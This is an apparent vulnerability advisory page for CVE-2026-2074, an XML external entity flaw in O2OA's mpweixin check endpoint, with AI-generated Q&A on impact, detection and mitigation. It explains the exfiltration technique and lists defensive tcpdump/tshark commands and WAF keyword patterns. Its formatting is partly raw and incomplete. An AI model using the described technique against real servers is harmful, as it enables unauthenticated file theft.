CVE-2026-2074
XML External Entity Injection in O2OA HTTP POST Handler
Publication date: 2026-02-07
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| zoneland | o2oa | to 9.0.0 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-610 | The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere. |
| CWE-611 | The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
[{'type': 'paragraph', 'content': 'CVE-2026-2074 is an XML External Entity (XXE) injection vulnerability found in the O2OA development platform versions 6.1.0 through 9.0.0. It exists in the HTTP POST Request Handler component, specifically in the endpoint /x_program_center/jaxrs/mpweixin/check. The vulnerability arises because the XML parser used by O2OA improperly processes XML documents containing external entity references, allowing an attacker to craft malicious XML payloads that reference external DTD files.'}, {'type': 'paragraph', 'content': 'An unauthenticated attacker can exploit this vulnerability remotely by sending a specially crafted HTTP POST request containing XML with external entity references. This triggers the XML parser to load and process the external entities, which can lead to reading arbitrary files on the server or performing out-of-band data exfiltration.'}, {'type': 'paragraph', 'content': "The vulnerability leverages the Java XML parser's behavior, which restricts internal DTD entity nesting but does not prevent exploitation via external DTD files. Attackers can use parameter entity nesting in the external DTD to trigger error-based feedback from the parser, enabling them to extract sensitive information."}] [1, 2, 3, 4]
How can this vulnerability impact me? :
This vulnerability can impact you by allowing attackers to read arbitrary files on the affected server, potentially exposing sensitive information such as configuration files, credentials, or other private data.
Additionally, the vulnerability can be used for out-of-band data exfiltration, meaning attackers can extract data remotely without direct access to the server.
The flaw affects the confidentiality, integrity, and availability of the system, as attackers might gain unauthorized access to sensitive data, manipulate data, or disrupt service.
Since the exploit is publicly available and requires no authentication, the risk of exploitation is significant, especially if the vulnerable O2OA platform is exposed to untrusted networks.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by monitoring for HTTP POST requests to the endpoint `/x_program_center/jaxrs/mpweixin/check` containing XML payloads with external entity references such as `<!DOCTYPE`, `<!ENTITY`, `SYSTEM`, or `PUBLIC`.'}, {'type': 'paragraph', 'content': 'One approach is to inspect network traffic or logs for suspicious XML data that includes these keywords, which indicate attempts to exploit the XML External Entity (XXE) injection.'}, {'type': 'paragraph', 'content': 'Example commands to detect such attempts could include using tools like `tcpdump` or `tshark` to capture HTTP POST requests and grep for suspicious XML content.'}, {'type': 'list_item', 'content': "Using tcpdump to capture HTTP POST requests to the vulnerable endpoint: tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep '/x_program_center/jaxrs/mpweixin/check'"}, {'type': 'list_item', 'content': 'Using tshark to filter HTTP POST requests containing XML external entity keywords: tshark -Y \'http.request.method == "POST" && http contains "<!DOCTYPE"\' -T fields -e http.file_data'}, {'type': 'paragraph', 'content': 'Additionally, Web Application Firewalls (WAFs) can be configured to detect and block XML payloads containing these keywords to help identify exploitation attempts.'}] [3]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting outbound network connections from the O2OA server to prevent it from accessing external HTTP services, which blocks out-of-band data exfiltration.
Configuring a Web Application Firewall (WAF) to detect and block XML payloads containing keywords such as `<!DOCTYPE`, `<!ENTITY`, `SYSTEM`, or `PUBLIC` can help prevent exploitation.
At the application level, modifying the XML processing logic to disable DTD processing and external entity resolution is recommended to effectively prevent XXE attacks.
Since no official patch or fix is currently available, consider isolating or replacing the affected product if possible.